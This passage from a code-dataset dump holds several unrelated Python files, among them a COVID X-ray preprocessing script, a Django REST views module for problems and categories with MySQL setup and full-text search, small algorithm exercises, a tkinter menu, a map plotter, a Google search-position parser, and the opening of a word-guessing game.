image_data.append([image_temp_resize, self.class_id[label]])\n # except:\n # pass\n\n data = np.asanyarray(image_data)\n X = []\n y = []\n # Iterate over the Data\n for x in data:\n X.append(x[0])\n y.append(x[1])\n\n self.trainX = np.asarray(X)/(255.0)\n self.train_y = np.asarray(y)\n\n self._pickle_train_data()\n 
print(\"Done with train data\")\n\n def _process_test_set(self):\n print(\"Processing test set\")\n image_data = []\n c = 0\n\n for datapoint in self.test_images:\n sample = datapoint.split(\" \")\n img = sample[1]\n label = sample[2]\n c = c + 1\n if c % 1000 == 0:\n print(\"Processed {} images of {}\".format(c, self.test_N))\n\n img_path = os.path.join(self.test_dir, img)\n # try:\n image_data_temp = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # Read Image as numbers\n image_temp_resize = cv2.resize(image_data_temp, (self.img_size, self.img_size))\n image_data.append([image_temp_resize, self.class_id[label]])\n # except:\n # pass\n\n data = np.asanyarray(image_data)\n\n X = []\n y = []\n for x in data:\n X.append(x[0])\n y.append(x[1])\n\n self.testX = np.asarray(X)/(255.0)\n self.test_y = np.asarray(y)\n\n self._pickle_test_data()\n print(\"Done with test data\")\n\n def _pickle_train_data(self):\n N = self.trainX.shape[0]\n N2 = int(N/2)\n with open(os.path.join(self.path, \"trainX1.pickle\"), \"wb\") as f:\n pickle.dump(self.trainX[0:N2, :, :], f)\n\n with open(os.path.join(self.path, \"trainX2.pickle\"), \"wb\") as f:\n pickle.dump(self.trainX[N2:N, :, :], f)\n\n with open(os.path.join(self.path, \"train_y.pickle\"), \"wb\") as f:\n pickle.dump(self.train_y, f)\n\n def _pickle_test_data(self):\n with open(os.path.join(self.path, \"testX.pickle\"), \"wb\") as f:\n pickle.dump(self.testX, f)\n\n with open(os.path.join(self.path, \"test_y.pickle\"), \"wb\") as f:\n pickle.dump(self.test_y, f)\n\n def _load_pickled_train_data(self):\n with open(os.path.join(self.path, \"trainX1.pickle\"), \"rb\") as f:\n X1 = pickle.load(f)\n\n with open(os.path.join(self.path, \"trainX2.pickle\"), \"rb\") as f:\n X2 = pickle.load(f)\n\n self.trainX = np.concatenate((X1, X2))\n\n with open(os.path.join(self.path, \"train_y.pickle\"), \"rb\") as f:\n self.train_y = pickle.load(f)\n\n def _load_pickled_test_data(self):\n with open(os.path.join(self.path, \"testX.pickle\"), \"rb\") as f:\n self.testX = pickle.load(f)\n\n with open(os.path.join(self.path, \"test_y.pickle\"), \"rb\") as f:\n self.test_y = pickle.load(f)\n\n\ndef main():\n\n path = \"path/to/file/with/data\" # this should be teh folder where you have subfolders train and test and there are the train and test omages\n train_file = \"path/to/folder/train_COVIDx2.txt\" \n test_file = \"path/to/folder/test_COVIDx2.txt\" \n\n dataloader = CovidImage(path, train_file, test_file)\n trainX, train_y, testX, test_y = dataloader.load_data()\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mimilazarova/DD2424-covid-xray-project","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5596,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"41734566515","text":"\"\"\"Descrição\nFazer um programa para ler uma string e calcular o número de palavras que ele contém. Exemplo: casa amarela, o número de palavras é 2. 
\n\nInput format\n\nA string with at least 1 character and at most 500.\n\nOutput format\n\nAn integer indicating the number of words in the string, followed by an end of line.\"\"\"\n\ninserir_palvras = input()\n\ncontar_palavras = len(inserir_palvras.split())\n\nprint (contar_palavras)","repo_name":"Andreza-S/Codando","sub_path":"códigos python/Contar palavras.py","file_name":"Contar palavras.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8085560778","text":"from rest_framework.decorators import api_view\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nimport mysql.connector\nimport json\nimport csv\nfrom root_config import main_root\nimport pandas as pd\n\nfrom main import Transform_join, Transform_sort\n\nmysql_connection = main_root()\n\n\ndef show_databases_tables(request):\n if request.method == 'GET':\n try:\n connection, databasename = mysql_connection.connection_databases()\n\n cursor = connection.cursor()\n\n cursor.execute(\"show databases\")\n databases_name = cursor.fetchall()\n all_databases = [databases[0] for databases in databases_name]\n\n cursor.execute(\"show tables\")\n tables_name = cursor.fetchall()\n all_tables = [tables[0] for tables in tables_name]\n\n cursor.execute(\"show columns from customers\")\n column_name = cursor.fetchall()\n\n customers_columns = [columns[0] for columns in column_name]\n\n cursor.execute(\"show columns from orders\")\n column_name = cursor.fetchall()\n\n orders_columns = [columns[0] for columns in column_name]\n\n print(customers_columns, orders_columns)\n connection.close()\n return JsonResponse({\n 'status': True,\n \"databases\": all_databases,\n \"tables\": {databasename: all_tables},\n \"customers_columns\": customers_columns,\n \"orders_columns\": orders_columns,\n \"msg\": \"Table created\"\n })\n\n except Exception as e:\n print(e)\n return JsonResponse({'status': False, \"msg\": \"Database not connected\"})\n\n\n@csrf_exempt\n@api_view(['POST'])\ndef connection_table(request):\n\n if request.method == 'POST':\n\n conn_data = json.loads(request.body) # parse JSON safely instead of eval() on an untrusted request body\n\n try:\n\n connection = mysql_connection.root_config(conn_data)\n try:\n cur = connection.cursor()\n cur.execute(\"create database \"+conn_data[\"database\"])\n connection.close()\n except:\n return JsonResponse({\"status\": False, \"msg\": \"Database already exist\"})\n\n connect_data, _ = mysql_connection.connection_databases()\n cur = connect_data.cursor()\n cur.execute(\n '''create table customers(\n CustomerID varchar(20),\n CompanyName varchar(50),\n ContactName varchar(50),\n ContactTitle varchar(50)\n )'''\n )\n\n cus_path = \"/opt/dataanalyzer/DataAnalyzer/customers.csv\"\n cus_list = []\n with open(cus_path) as cus_file:\n cus_csv = csv.DictReader(cus_file)\n for i in cus_csv:\n cus_list.append(i)\n cus_list = eval(json.dumps(cus_list))\n\n cus_query = '''INSERT INTO customers (\n CustomerID,\n CompanyName,\n ContactName,\n ContactTitle\n ) VALUES (%s,%s,%s,%s)'''\n\n for data in cus_list:\n val = (data[\"CustomerID\"], data[\"CompanyName\"],\n data[\"ContactName\"], data[\"ContactTitle\"])\n cur.execute(cus_query, val)\n connect_data.commit()\n\n cur.execute(\n '''create table orders(\n CustomerID varchar(255), \n EmployeeID varchar(255), \n Freight varchar(255), \n OrderDate varchar(255), \n OrderID varchar(255), \n RequiredDate varchar(255), \n ShipVia varchar(255), \n ShippedDate varchar(255)\n )'''\n )\n\n # 
cur.execute(\n #     '''LOAD DATA INFILE '\"/home/vkscnb/Desktop/DataAnalyzer/customers.csv\"'\n #     INTO TABLE customers\n #     FIELDS TERMINATED BY ','\n #     ENCLOSED BY '\"'\n #     LINES TERMINATED BY '\\n'\n #     IGNORE 1 ROWS\n #     (CustomerID,CompanyName,ContactName,ContactTitle)\n #     '''\n # )\n\n # cur.execute(\n #     '''LOAD DATA INFILE 'cus_csv'\n #     INTO TABLE orders\n #     FIELDS TERMINATED BY ','\n #     ENCLOSED BY '\"'\n #     LINES TERMINATED BY '\\n'\n #     IGNORE 1 ROWS\n #     '''\n # )\n\n ord_path = \"/opt/dataanalyzer/DataAnalyzer/orders.csv\"\n ord_list = []\n with open(ord_path) as csv_file:\n ord_csv = csv.DictReader(csv_file)\n for i in ord_csv:\n ord_list.append(i)\n ord_list = eval(json.dumps(ord_list))\n\n ord_query = '''INSERT INTO orders (\n CustomerID,\n EmployeeID,\n Freight,\n OrderDate,\n OrderID,\n RequiredDate,\n ShipVia,\n ShippedDate\n ) VALUES (%s,%s,%s,%s,%s,%s,%s,%s)'''\n\n for data in ord_list:\n val1 = (data[\"CustomerID\"],\n data[\"EmployeeID\"],\n data[\"Freight\"],\n data[\"OrderDate\"],\n data[\"OrderID\"],\n data[\"RequiredDate\"],\n data[\"ShipVia\"],\n data[\"ShippedDate\"]\n )\n cur.execute(ord_query, val1)\n connect_data.commit()\n\n return JsonResponse({'status': True, \"msg\": \"DataBase is connected\"})\n except Exception as e:\n return JsonResponse({'status': False, \"msg\": \"DataBase is not connected\"})\n\n\n@csrf_exempt\ndef join_tables(request):\n if request.method == 'POST':\n\n joining_data = json.loads(request.body)\n\n try:\n\n connection, _ = mysql_connection.connection_databases()\n cursor = connection.cursor()\n\n cursor.execute(\"select * from customers\")\n row_headers = [x[0] for x in cursor.description]\n data = cursor.fetchall()\n json_data = []\n for result in data:\n json_data.append(dict(zip(row_headers, result)))\n table1 = eval(json.dumps(json_data))\n\n df_a = pd.DataFrame(table1)\n\n cursor.execute(\"select * from orders\")\n row_headers = [x[0] for x in cursor.description]\n data = cursor.fetchall()\n json_data = []\n for result in data:\n json_data.append(dict(zip(row_headers, result)))\n table2 = eval(json.dumps(json_data))\n\n df_b = pd.DataFrame(table2)\n\n df_c = Transform_join(\n df_a, df_b, joining_data['columnName'], 'inner')\n\n join_data = eval(json.dumps(df_c.to_dict(orient='records')))\n # close the connection before returning; placed after the return it was never reached\n connection.close()\n\n return JsonResponse({\"status\": True, \"msg\": \"table join\", \"join_data\": join_data})\n\n except Exception as e:\n return JsonResponse({\"status\": False, \"msg\": \"table not join\"})\n\n\n@csrf_exempt\ndef transform_data(request):\n if request.method == \"POST\":\n try:\n\n transform_data = json.loads(request.body)\n\n df_b = pd.DataFrame(transform_data['data'])\n order = True if transform_data[\"orderby\"] == \"asce\" else False\n df_d = Transform_sort(df_b, transform_data[\"selectid\"], order)\n transform_data = eval(json.dumps(df_d.to_dict(orient='records')))\n\n return JsonResponse({\"status\": True, \"msg\": \"transform data\", \"transform_data\": transform_data})\n\n except Exception as e:\n return JsonResponse({\"status\": False, \"msg\": \"not transform data\"})\n\n# @csrf_exempt\n# def show_data(request):\n#     if request.method == \"POST\":\n#         try:\n\n#             return JsonResponse({\"status\":True, \"msg\":\"show data\"})\n\n#         except Exception as e:\n#             return JsonResponse({\"status\":False, \"msg\":\"not data 
created\"})\n","repo_name":"vkscnb/DataAnalyzer","sub_path":"backend/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31499630218","text":"from LinkedList_2 import *\n\"\"\"\nclass Cat:\n def __init__(self):\n pass\n\n\nclass Dog:\n def __init__(self):\n pass\n\"\"\"\n\n\nclass AnimalWrapper:\n def __init__(self, animal, time):\n self.time = time\n self.animal = animal\n\nclass ListHeadTail:\n def __init__(self):\n self.head = None\n self.tail = None\n\nclass ShelterQueue:\n def __init__(self):\n self.time = 0\n # dog, cat\n self.queue = [ListHeadTail(), ListHeadTail()]\n\n def enqueue(self, animal):\n if animal[0] == 'c':\n self.__enqueue(animal, 1, self.time)\n elif animal[0] == 'd':\n self.__enqueue(animal, 0, self.time)\n else:\n raise Exception(\"wrong animal\")\n self.time += 1\n\n def __enqueue(self, animal,cat_dog_index, time):\n wrapper = Node(AnimalWrapper(animal, time))\n\n if not self.queue[cat_dog_index].head:\n self.queue[cat_dog_index].head = wrapper\n self.queue[cat_dog_index].tail = wrapper\n else:\n self.queue[cat_dog_index].tail.next = wrapper\n self.queue[cat_dog_index].tail = wrapper\n\n def dequeueAny(self):\n if not (self.queue[0].head or self.queue[1].head):\n raise Exception(\"queue empty\")\n time = float('inf')\n isCat = False\n if self.queue[0].head and self.queue[0].head.data.time < time:\n time = self.queue[0].head.data.time\n isCat = False\n if self.queue[1].head and self.queue[1].head.data.time < time:\n time = self.queue[1].head.data.time\n isCat = True\n if isCat:\n return self.dequeueCat()\n else:\n return self.dequeueDog()\n\n def dequeueCat(self):\n return self.__dequeue(1)\n\n def dequeueDog(self):\n return self.__dequeue(0)\n\n def __dequeue(self, cat_dog_index):\n if not self.queue[cat_dog_index].head:\n raise Exception(\"can’t dequeue - empty\")\n animal = self.queue[cat_dog_index].head.data.animal\n self.queue[cat_dog_index].head = self.queue[cat_dog_index].head.next\n if not self.queue[cat_dog_index].head:\n self.queue[cat_dog_index].tail = None\n return animal\n\n\nif __name__ == \"__main__\":\n queue = ShelterQueue()\n vals = [\"c1\", \"d1\", \"d2\", \"c2\", \"c3\"]\n for v in vals:\n queue.enqueue(v)\n print(queue.dequeueCat())\n print(queue.dequeueDog())\n print(queue.dequeueAny())\n queue.enqueue(\"d3\")\n print(queue.dequeueDog())\n\n","repo_name":"Mitan/interview-book","sub_path":"ch_3/3_6.py","file_name":"3_6.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36701032953","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'hourglassSum' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts 2D_INTEGER_ARRAY arr as parameter.\n#\n\ndef hourglassSum(arr):\n max_sum = float('-inf') # Khởi tạo giá trị max_sum là giá trị âm vô cùng\n #Tính giá trị theo hình đồng hồ cát \n for i in range(len(arr) - 2): # Duyệt qua các hàng\n for j in range(len(arr) - 2): # Duyệt qua các cột\n current_sum = (\n arr[i][j] + arr[i][j + 1] + arr[i][j + 2] + # 3 phần tử bên trên\n arr[i + 1][j + 1] + # Phần tử ở giữa\n arr[i + 2][j] + arr[i + 2][j + 1] + arr[i + 2][j + 2] #3 phần từ ở dưới\n )\n max_sum = max(max_sum, current_sum) # Cập nhật giá trị max_sum\n\n return max_sum\n\ndef hourglass_sum(arr):\n n = len(arr)\n m = 
len(arr[0])\n sums = [[0] * m for _ in range(n)]\n\n # Compute inclusive prefix sums from the top-left corner to the current position\n for i in range(n):\n for j in range(m):\n sums[i][j] = arr[i][j] + (\n sums[i-1][j] if i > 0 else 0) + (\n sums[i][j-1] if j > 0 else 0) - (\n sums[i-1][j-1] if i > 0 and j > 0 else 0)\n\n max_sum = float('-inf')\n\n # Traverse each position and compute the hourglass sum\n for i in range(2, n):\n for j in range(2, m):\n # sum of the full 3x3 block with bottom-right corner (i, j); the\n # original 2x2 prefix-sum expression did not match the hourglass shape\n block = (sums[i][j]\n - (sums[i-3][j] if i > 2 else 0)\n - (sums[i][j-3] if j > 2 else 0)\n + (sums[i-3][j-3] if i > 2 and j > 2 else 0))\n # remove the two middle-row corners to leave the hourglass shape\n hg = block - arr[i-1][j-2] - arr[i-1][j]\n max_sum = max(max_sum, hg)\n\n return max_sum\n\nif __name__ == '__main__':\n arr = []\n #Example for input:\n # 1 1 1 0 0 0\n # 0 1 0 0 0 0\n # 1 1 1 0 0 0\n # 0 0 2 4 4 0\n # 0 0 0 2 0 0\n # 0 0 1 2 4 0\n for _ in range(6):\n arr.append(list(map(int, input().rstrip().split())))\n\n # result = hourglassSum(arr)\n result = hourglass_sum(arr)\n print(\"result: \",result)\n\n","repo_name":"SmithC3k56/GiaiThuat","sub_path":"data_structor/hour_glass.py","file_name":"hour_glass.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34809519289","text":"from tkinter import *\nfrom .registrar import registrarEstudiante\nfrom .editar import editarEstudiante\nfrom .eliminar import eliminarEstudiante\ndef menuEstudiante():\n \n y2 = Frame()\n y2.config(background = \"#213141\")\n y2.place(x=0, y=0, width=500, height=1000)\n y3 = Label(y2, text=\"REGISTER STUDENT\",bg='black', fg='white', width=25, font=(\"bold\", 22))\n y3.place(x=40, y=60)\n #y3.pack(fill=X)\n \n Button(y2, text='CREATE STUDENT', width=50,padx = 10, pady = 10, bg=\"black\", fg='white',command=registrarEstudiante).place(x=70, y=130)\n Button(y2, text='EDIT STUDENT', width=50,padx = 10, pady = 10, bg=\"black\", fg='white',command=editarEstudiante).place(x=70, y=180)\n Button(y2, text='DELETE STUDENT', width=50,padx = 10, pady = 10, bg=\"black\", fg='white',command=eliminarEstudiante).place(x=70, y=230)\n Button(y2, text='RETURN', width=40, bg=\"#cd5656\", fg='white', command=lambda:[y2.destroy()]).place(x=115, y=280)","repo_name":"dgonzalezt2/MSSQL_with_PythonGUI","sub_path":"GUI/views/student/vistaPrincipal.py","file_name":"vistaPrincipal.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8281704909","text":"#!/usr/bin/env python\n# -- coding: utf-8 --\n\"\"\"\n\"\"\"\nimport json\nfrom datetime import datetime\n\n\nfrom django.http.request import HttpRequest\nfrom django.db.transaction import TransactionManagementError\nfrom django.core.exceptions import ObjectDoesNotExist, FieldError\nfrom django.db import transaction, DatabaseError, OperationalError, IntegrityError, Error\nfrom django.http import JsonResponse\n\n\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_500_INTERNAL_SERVER_ERROR, HTTP_201_CREATED, HTTP_400_BAD_REQUEST, HTTP_200_OK, HTTP_404_NOT_FOUND\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.renderers import JSONRenderer\n# from rest_framework_xml.renderers import XMLRenderer\nfrom rest_framework.response import Response\nfrom rest_framework.pagination import PageNumberPagination\n\n\nfrom django.core.files.base import ContentFile\n\nfrom helpers.models import Category, Problem, Media\nfrom helpers.serializers import 
(SaveProblemSerializer, AddCategorySerializer,\n AllCategorySerializer, ProblemCategorySerializer,\n ProblemSerializer, SearchSerializer)\n\n\nimport base64\n\n\n# format, imgstr = data.split(';base64,')\n# ext = format.split('/')[-1]\n\n# data = ContentFile(base64.b64decode(imgstr), name='temp.' + ext) # You can save this as file instance.\n\nclass CatId(Exception):\n pass\n\nclass NotField(Exception):\n pass\n\n\n\nclass ControlerViewSet(ViewSet):\n \"\"\" Base (super) class for the views \"\"\"\n permission_classes = (AllowAny,)\n renderer_classes = (JSONRenderer, )\n read_only = True\n\n\n\n def error_resp(self, error, message='Error', status=HTTP_400_BAD_REQUEST):\n error_dict = {'error': message}\n # print(error) # TODO: write this to the logs\n self.resp = JsonResponse(error_dict, status=status)\n self.resp.headers['Content-Type'] = 'application/json; charset=utf-8'\n return self.resp\n\n def decor_error(fn):\n \"\"\"error-catching decorator\"\"\"\n def wrapper(self, *args, **kwargs):\n try:\n n = fn(self, *args, **kwargs)\n if n:\n return Response(n, status=HTTP_201_CREATED)\n else:\n return Response(status=HTTP_201_CREATED)\n\n except TransactionManagementError as e: # raised for any and all problems related to database transactions.\n return self.error_resp(e, 'Error', HTTP_400_BAD_REQUEST)\n except DatabaseError as e:\n return self.error_resp(e, f'{str(e)} database error', HTTP_400_BAD_REQUEST)\n except IndexError as e:\n return self.error_resp(e, f'{str(e)} database error', HTTP_400_BAD_REQUEST)\n except FieldError as e: # FieldError is raised when there is a problem with a model field.\n return self.error_resp(e, f'{str(e)} error in the requested fields', status=HTTP_400_BAD_REQUEST )\n except ValidationError as e:\n return self.error_resp(e, f'Validation error {str(e)}', HTTP_400_BAD_REQUEST)\n except Error as e: # base class for DB-related errors\n return self.error_resp(e, f'Database error {str(e)}', status=HTTP_400_BAD_REQUEST )\n except NotField as e:\n return self.error_resp(e, \"The fields name, text, html_page, user and category are required\", status=HTTP_400_BAD_REQUEST)\n except AttributeError as e:\n return self.error_resp(e, f\"Error {str(e)}\", status=HTTP_400_BAD_REQUEST )\n except ConnectionError as e: # base class for connection-related problems.\n return self.error_resp(e, f'{str(e)} Connection problems', status=HTTP_400_BAD_REQUEST )\n except RuntimeError as e:\n return self.error_resp(e, f'{str(e)} Connection problems', status=HTTP_400_BAD_REQUEST )\n except Exception as e:\n print(e)\n return self.error_resp(e, f'{str(e)} Error', status=HTTP_400_BAD_REQUEST )\n return wrapper\n\n\n\n @decor_error\n def add_problem(self, request: HttpRequest, *args, **kwargs):\n \"\"\" POST request for adding an answer\"\"\"\n serializer = SaveProblemSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n with transaction.atomic():\n data = serializer.validated_data\n\n name = data.get('name', '').capitalize()\n text = data.get('text', '')\n html_page = data.get('html_page', '')\n user = data.get('user', 1)\n category = data.get('category', [])\n\n if name==\"\" or text==\"\" or html_page==\"\" or user==\"\" or category==[]:\n raise NotField\n\n problem = Problem()\n problem.name = name\n problem.text = text\n problem.html_page = html_page\n problem.user = user\n problem.save()\n\n for i in category: # adding categories\n problem.category.add(i)\n\n for i in data.get('problem_media', []):\n media = Media()\n media.problem = 
problem\n data = i.get(\"image\")\n format, imgstr = data.split(';base64,')\n ext = format.split('/')[-1]\n media.type_file = ext\n res = ContentFile(base64.b64decode(imgstr), name=f'{problem.id}.{ext}')\n media.image_path = res\n media.image = data\n media.save()\n return\n\n\n @decor_error\n def update_problem(self, request: HttpRequest, problem_pk: int, *args, **kwargs):\n \"\"\"POST request to update a record from the view\"\"\"\n serializer = SaveProblemSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n with transaction.atomic():\n data = serializer.validated_data\n problem = Problem.objects.get(pk=problem_pk)\n\n name = data.get('name', '').capitalize()\n text = data.get('text', '')\n html_page = data.get('html_page', '')\n user = data.get('user', 1)\n category = data.get('category', [])\n\n problem.name = name\n problem.text = text\n problem.html_page = html_page\n problem.user = user\n problem.save()\n\n\n problem.category.clear()\n\n if name==\"\" or text==\"\" or html_page==\"\" or user==\"\" or category==[]:\n raise NotField\n\n for i in category:\n problem.category.add(i)\n\n for i in data.get('problem_media', []):\n media = Media()\n media.problem = problem\n data = i.get(\"image\")\n format, imgstr = data.split(';base64,')\n ext = format.split('/')[-1]\n media.type_file = ext\n res = ContentFile(base64.b64decode(imgstr), name=f'{problem.id}.{ext}')\n media.image_path = res\n media.save()\n return\n\n\n @decor_error\n def delete_problem(self, request: HttpRequest, problem_pk: int, *args, **kwargs):\n \"\"\"POST request to delete a record from the view\"\"\"\n snippet = Problem.objects.get(pk=problem_pk)\n snippet.is_published = False\n snippet.save()\n return\n\n\n @decor_error\n def delete_category(self, request: HttpRequest, category_pk: int, *args, **kwargs):\n \"\"\"POST request to delete a category from the view\"\"\"\n snippet = Category.objects.get(pk=category_pk)\n for i in snippet.problem_set.all():\n if i.category.count()==1:\n i.is_published=False\n i.save()\n snippet.delete()\n return\n\n\n @decor_error\n def delete_image(self, request: HttpRequest, image_pk: int, *args, **kwargs):\n \"\"\"POST request to delete an image from the view\"\"\"\n snippet = Media.objects.get(pk=image_pk)\n snippet.delete()\n return\n\n\n @decor_error\n def add_category(self, request: HttpRequest, *args, **kwargs):\n \"\"\"POST: add a category\"\"\"\n serializer = AddCategorySerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n data = serializer.validated_data\n try:\n cat = Category.objects.get(cat_name=data.get(\"cat_name\"))\n except Category.DoesNotExist as e:\n cat = Category()\n cat.cat_name = data.get(\"cat_name\").capitalize()\n cat.save()\n return cat.id\n\n\n @decor_error\n def update_category(self, request: HttpRequest, category_pk: int, *args, **kwargs):\n serializer = AddCategorySerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n data = serializer.validated_data\n cat = Category.objects.get(pk=category_pk)\n cat.cat_name = data.get(\"cat_name\", \"\").capitalize()\n cat.save()\n return\n\n\n\n # @decor_error # with pagination\n # def all_category(self, request: HttpRequest, *args, **kwargs):\n # records = Category.objects.all().order_by('cat_name')\n # pagination = PageNumberPagination()\n # qs = pagination.paginate_queryset(records, request)\n # serializer = AllCategorySerializer(qs, many=True)\n # return pagination.get_paginated_response(serializer.data).data\n\n @decor_error\n def 
all_category(self, request: HttpRequest, *args, **kwargs):\n records = Category.objects.all().order_by('cat_name')\n serializer = AllCategorySerializer(records, many=True)\n return serializer.data\n\n\n\n\n#path('problem/category/', ControlerViewSet.as_view({\"post\":\"problem_category\"})), # lists the problems of a particular category\n\n\n @decor_error\n def problem_category(self, request: HttpRequest, category_pk: int, *args, **kwargs):\n \"\"\"problems of a category, with pagination\"\"\"\n problem = Problem.objects.all().order_by('-time_update').filter(category=category_pk, is_published=True)\n pagination = PageNumberPagination()\n qs = pagination.paginate_queryset(problem, request)\n serializer = ProblemCategorySerializer(qs, many=True)\n return pagination.get_paginated_response(serializer.data).data\n\n\n @decor_error\n def view_problem(self, request: HttpRequest, problem_pk: int, *args, **kwargs):\n problem = Problem.objects.get(pk=problem_pk)\n if problem.is_published == True:\n serializer = ProblemSerializer(problem, many=False)\n return serializer.data\n raise FieldError\n\n\n\n @decor_error\n def all_problem(self, request: HttpRequest, *args, **kwargs):\n problem = Problem.objects.all()\n serializer = ProblemCategorySerializer(problem, many=True)\n return serializer.data\n\n\n\n @decor_error\n def search_problem(self, request: HttpRequest, *args, **kwargs):\n serializer = SearchSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n data = serializer.validated_data\n search_text = data.get(\"search\", \"\")\n\n # parameterised query: interpolating user input with an f-string was a SQL injection risk\n records = Problem.objects.raw(\"\"\"select hp.*\n from helpers_problem hp\n where to_tsvector('russian', \"name\") || to_tsvector('russian', \"text\") @@ plainto_tsquery(%s)\n ORDER BY ts_rank(to_tsvector('russian', \"text\"), plainto_tsquery(%s)), ts_rank(to_tsvector('russian', \"name\"), plainto_tsquery(%s)), time_create desc;\"\"\", [search_text, search_text, search_text])\n pagination = PageNumberPagination()\n qs = pagination.paginate_queryset(records, request)\n serializer = ProblemCategorySerializer(qs, many=True)\n return pagination.get_paginated_response(serializer.data).data\n","repo_name":"MiLara8888/helpers","sub_path":"helpers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32896116726","text":"import gmplot\n\n#gmap = gmplot.GoogleMapPlotter(57.7, 11.9, 16)\n#gmap.scatter(ADAM[0], ADAM[1], 'k', size=40, marker=True)\n# lats = get_latitudes(apartment_list)\n# longs = get_longitudes(apartment_list)\n# print(longs[0])\n# gmap.plot(lats, longs, 'cornflowerblue', edge_width=10)\n# gmap.scatter(more_lats, more_lngs, '#3B0B39', size=40, marker=False)\n# gmap.scatter(lats, longs, 'k', marker=True)\n\n#gmap.heatmap(ADAM[0], ADAM[1])\n#gmap.draw(\"mymap.html\")\n\ndef scatter_apts(gmap, apartment_list):\n\n i = 0\n for apt in apartment_list:\n long = apt.location.longitude\n lat = apt.location.latitude\n tmp = list(zip([int(float(lat)* 10**5)/(10**5), int(float(long)*10**5)/(10**5)]))\n title_str = \"apt\"+str(i)\n\n gmap.apt_scatter(tmp[0], tmp[1], title = title_str, content = apt, c = '#E9967A', size=40, marker=True)\n i=i+1\n\n# var infowindow = new google.maps.InfoWindow({ content: contentString });\n# var\n# marker = new\n# google.maps.Marker({\n# position: uluru,\n# map: map,\n# title: 'Uluru (Ayers Rock)'\n# });\n# marker.addListener('click', function()\n# {\n# infowindow.open(map, marker);\n# });\n\n return 
gmap","repo_name":"wilhelmssonjens-zz/hittahem","sub_path":"drawmap.py","file_name":"drawmap.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25715452428","text":"def fizzBuzz(n: int):\n\n answer = []\n\n for i in range(1,n+1):\n if i%15 == 0:\n answer.append(\"FizzBuzz\")\n elif i%3 ==0:\n answer.append(\"Fizz\")\n elif i%5 == 0:\n answer.append(\"Buzz\")\n else:\n answer.append(str(i))\n\n\n return answer\n\n#another way\n#return ['FizzBuzz' if i%15 == 0 else 'Buzz' if i%5 == 0 else 'Fizz' if i%3 == 0 else str(i) for i in range(1,n+1)]\n\n#main\nN = int(input(\"Enter the n : \"))\nprint(fizzBuzz(N))","repo_name":"Hana-esf/LeetCode","sub_path":"python/4_FizzBuzz.py","file_name":"4_FizzBuzz.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30080044676","text":"import random\nfrom requests_html import HTMLSession\nfrom datetime import date\nfrom time import time, sleep\n\n\nt1 = time()\n\n\nparsed_date = 1000\n\n\ndef serp_parser(key, domain='py4you.com', a=100, b=1000):\n\n global parsed_date\n\n parsed_date = parsed_date + 10010\n\n print('Send request:', key)\n\n with HTMLSession() as session:\n try:\n resp = session.get(\n f'https://www.google.com/search?q={key}&num=100&hl=en')\n if resp.status_code != 200:\n raise ValueError('Status code is not 200')\n links = resp.html.xpath('//div[@class=\"r\"]/a[1]/@href')\n found = 'not_found'\n except Exception as e:\n print(type(e), e)\n links = []\n found = 'ban_google'\n\n result = [parsed_date, key, found, '-']\n\n for position, url in enumerate(links, 1):\n if domain in url:\n result = [parsed_date, key, url, position]\n\n return result, 'blabla', 'data', 'url'\n\n\nt2 = time()\n\n\nmy_position1 = serp_parser('python for seo')\nmy_position2 = serp_parser('python for you')\nmy_position3 = serp_parser('заказать seo')\n\n\n# data = ('купить seo', 'rozetka.com.ua', 1001)\n\ndata = {\n 'key': 'купить seo',\n 'domain': 'rozetka.com.ua',\n 'a': 1000\n}\n\n\n# my_position4 = serp_parser(data[0], data[1], data[2], data[3])\n\nmy_position4 = serp_parser(**data)\n\nprint(f'All done!')\n\nprint(my_position1)\nprint(my_position2)\nprint(my_position3)\nprint(my_position4)\n\nprint('Working time is: ', round(t2-t1, 4), ' seconds')\n\nprint(parsed_date)\n","repo_name":"vvscode/py--notes","sub_path":"py4seo/Код с занятий/lesson5/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27125555714","text":"#This is A Word Guess Game!\nprint('====THIS IS A WORD GUESS GAME====')\nimport random\n\nwords = ['beautiful', 'handsome', 'pretty', 'smart', 'eloquent']\nguess = input('Guess the word i am thinking of: (beautiful/handsome/pretty/smart/eloquent)')\n\nif random.choice(words) == guess:\n 